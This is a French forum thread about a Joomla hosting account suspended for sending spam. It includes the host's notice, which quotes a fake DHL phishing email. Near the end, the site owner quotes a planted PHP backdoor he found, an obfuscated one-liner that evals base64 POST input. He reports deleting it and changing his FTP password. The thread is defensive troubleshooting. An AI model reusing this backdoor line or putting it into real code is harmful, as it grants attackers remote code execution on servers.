Problème de spam depuis mon hébergement

[Bidule21]

Bonjour à tous,

J'ai reçu le bel email ci-dessous de mon hébergeur, les quelques sites situés sur cet hébergeur sont sur du joomla à jour, d'après eux le problème viendrait d'une faille sur un des scripts utilisés. Cela vous semble-t-il plausible au vu de l'email qu'ils m'ont fait suivre, ou bien cela peut-il venir directement d'un problème au niveau de l'hébergement ?

Auriez-vous des pistes à me donner pour trouver l'origine du problème et où pourrait se trouver la faille s'il y en a bien une, j'ai jeté un oeil au ftp, à priori je n'ai pas vu de script rajouté, mais ça peut évidemment être bien planqué...

Un mail envoyé par la fonction mail de PHP l'est-il nécessairement par le biais d'une faille, ou changer des mots de passe pourrait suffire à bloquer la situation ?

Enfin voilà, en gros je suis un peu bloqué pour le moment, et je ne sais pas trop où chercher... :

Madame, Monsieur,

Nous vous informons qu'un problème se pose avec votre hébergement xxxx.
Nous avons détecté que votre site envoi des quantités très importantes de mails de SPAM au travers de la fonction mail de PHP.
L'un de vos scripts PHP semble donc contenir une faille de securité que des pirates exploitent.

Afin de ne pas faire blacklister nos serveurs, nous sommes dans l'obligation de couper votre site tant que les modifications n'ont pas été effectuées dans vos scripts afin de les sécuriser.

Votre site est donc coupé à partir de cette minute.

Voici la copie de l'un des mails envoyés :
------

Received: from unknown (HELO xxxx.phpnet.org) (46.255.163.164)
by mailfilter.phpnet.org with SMTP; 11 Jul 2013 15:29:03 -0000
Received: from xxxx by xxxx.phpnet.org with local (Exim 4.72)
(envelope-from <xxxx@xxxx.phpnet.org>)
id 1UxInn-0001Hy-1j
for lisae@fieldassets.com; Thu, 11 Jul 2013 17:29:03 +0200
Date: Thu, 11 Jul 2013 17:29:03 +0200
Message-Id: <E1UxInn-0001Hy-1j@xxxx.phpnet.org>
To: lisae@fieldassets.com
Subject: Shipping Detail
From: "Mail Service" <support@postbank-vermoegensberatung.com>
X-Mailer: MyPHPMailer
Reply-To: "Mail Service" <support@postbank-vermoegensberatung.com>
Mime-Version: 1.0
Content-Type: multipart/alternative;boundary="----------137355654351DECF3F0C318"

------------137355654351DECF3F0C318
Content-Type: text/plain; charset="ISO-8859-1"; format=flowed
Content-Transfer-Encoding: 7bit

If the links are not working, please move message to "Inbox" folder.

DHL

DHL Notification

Your parcel has arrived on July 1st. Courier was unable to deliver
the parcel to you.

To get additional info about this shipment use any of these options:


1) Click the following URL in your browser:

Get Shipment Info

...

------
Bien cordialement,

L'Equipe PHPNET

Si vous avez des idées, pistes, ou que sais-je encore... Je suis preneur !

Redescendre des sauvegardes pourrait-il améliorer la situation ?

Merci !

Guillaume

[Dan]

Cela vient bien évidemment de l'un de tes sites.

Sur lequel utilises-tu MyPHPMailer ?

Tu dois avoir un formulaire insuffisamment sécurisé !

[Bidule21]

Merci pour ta réponse Dan !

Ils ont donc raison, en même temps je ne remettais pas trop leur parole en doute au vu de mes connaissances ... Le problème c'est que j'utilisais surtout ces sites là pour des tests, et donc ils sont bourrés d'extensions, plugins et autres modules... Donc pour retrouver lequel fait quoi, ce n'est pas gagné... Je pensais à tout remettre à plat, je crois que le moment va être venu, juste un poil plus rapidement que prévu...
Et ça m'apprendra à tester des trucs en prod plutôt qu'en local, ça m'éviterait de surcharger ce qui est en ligne...

MyPHPmailer et PHPmailer c'est la même chose ou pas ?

[Dan]

MyPHPmailer et PHPmailer c'est la même chose ou pas ?

Aucune idée !

[Bidule21]

AH bah tant pis Je ne trouve que du phpmailer de toute façon, et ils l'utilisent tous... Aussi bien Joomla même, que certaines extensions...
J'ai repéré certaines extensions pas à jour, j'ai demandé à mon hébergeur pour qu'ils redonnent accès à mes interfaces d'admin uniquement à mon IP pour faire ces mises à jour et voir ensuite si cela a résolu le problème, si cela ne pouvait être que cela, ce serait nickel ! Sinon, bah ce sera refonte totale des sites, heureusement que j'ai tous les textes de côtés, par contre ça va swinger de la redirection

[Nicolas]

Bonsoir,

Est-ce que tu avais bien la dernière version installée de phpmailer (5.2.6 release) ?

Modifié 14 Juillet 2013 par Nicolas

[Bidule21]

Bonsoir,

En l’occurrence je viens de vérifier il s'agit de la version 5.2.1 qui est fournie avec Joomla. En tous cas, de ce que je vois sur les version 2.5.9 et 2.5.11.

Ce qui me fait penser d'ailleurs qu'un moyen d'éviter ce problème serait peut-être de passer la configuration de Joomla pour l'envoi en smtp plutôt qu'avec phpmail ou sendmail, qu'en pensez-vous ?

Modifié 14 Juillet 2013 par Bidule21

[Dadou]

Ce n'est pas forcement phpmailer qui est en cause, c'est peut être l'appli ou les extensions qui l'utilisent qui ont une faille de sécurité

[Dan]

Je n'ai jamais dit que PhpMailer était le fautif. Il est simplement utilisé par un script php pour envoyer le spam...

Pour moi, je répète qu'il doit s'agir d'un formulaire insuffisamment sécurisé !

[yreveill]

Ou peut être d'un quelconque module hors envoi de mail mais qui a une faille exploitée pour aller chercher ledit module pour utiliser mail().

Parfois l'accès aux logs du site web permet de voir comment la faille a été exploitée et du coup la corriger.

[Bidule21]

Oui oui effectivement, c'est sûrement la faute d'une extension (composant module plugin qu'importe...). En fouillant dans les logs je crois avoir trouvé l'IP coupable, provenance des emirats arabes unis, qui tape systématiquement en POST sur une page qui n'existe pas mais sur un composant qui après recherche semble déjà avoir subit des attaques... Je vais déjà tenter une mise à jour de tout ce qu'il y a, dès que mon hébergeur m'aura répondu histoire de voir si il veut bien au moins me débloquer l'accès. Au pire tant pis, je virerai tout et repartirai sur du propre...

[Bidule21]

Bonjour,

Un merci à tout le monde, les sites sont de retour, j'espère pour un moment...
Finalement, ce n'était pas un composant en cause apparemment, puisque j'ai retrouvé un fichier qui n'était pas censé être là dans un de mes dossiers.
Son contenu était le suivant <?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));} ?> et d'après ce que l'ami google raconte, c'est maaaaal (moi je n'y comprends rien...)
Le problème est surtout que je ne comprends pas comment il a été possible d'uploader ce fichier sur mon ftp, mon mot de passe chopé en clair lors d'un transfert ftp ? Cela vous paraît plausible ?

J'ai modifié le mot de passe, reste plus qu'à croiser les doigts...

Edit : Si cela venait d'une récupération du mot de passe lors d'un transfert ftp, je viens de découvrir que chez cet hébergeur je pouvais me connecter en sftp, ça sera toujours ça de sécurité en plus

Modifié 27 Juillet 2013 par Bidule21

[yuston]

Il y a peut-être un module/plugin/fichier/.... dans ton serveur FTP qui permet l'upload de fichier (et ce n'est pas étonnant, il y a sûrement une fonction qui te permet d'uploader des images sur ton serveur). Il faudrait essayer de voir de ce côté là également et sécuriser la fonction d'upload.

[tomorox]

J'ai eut exactement le même problème que toi sur mon petit blog http://www.caramel-tea.com avec une erreur peut être légèrement différente je ne me rappele plus. J'utilisais un Joomla 2.5.

Mon formulaire de contact était celui de base. Pour résoudre le problème j'ai installation différentes extensions pour gérer les mails, mais idem. N'étant pas pro PHP/SQL&CO j'ai basculé mon blog sous Wordpress et les problèmes

d'envoie spam de mail se sont arretés. Je n'ai jamais donc su vraiment d'où venait le problème, mais certainement d'une faille qui ne provenait pas forcément de la gestion des mails en elle même. Une faille X ou Y dans Joomla je pense pour accéder à l'utilisation des mails.

[Bidule21]

Merci pour ton retour, pour ma part comme je le disais plus haut, le fait de supprimer le fichier qui n'avait rien à faire là, et changer mon mot de passe ftp ont résolu le souci, comment ce fichier avait atterri là, aucune idée, mais au moins cela fonctionne-t-il maintenant correctement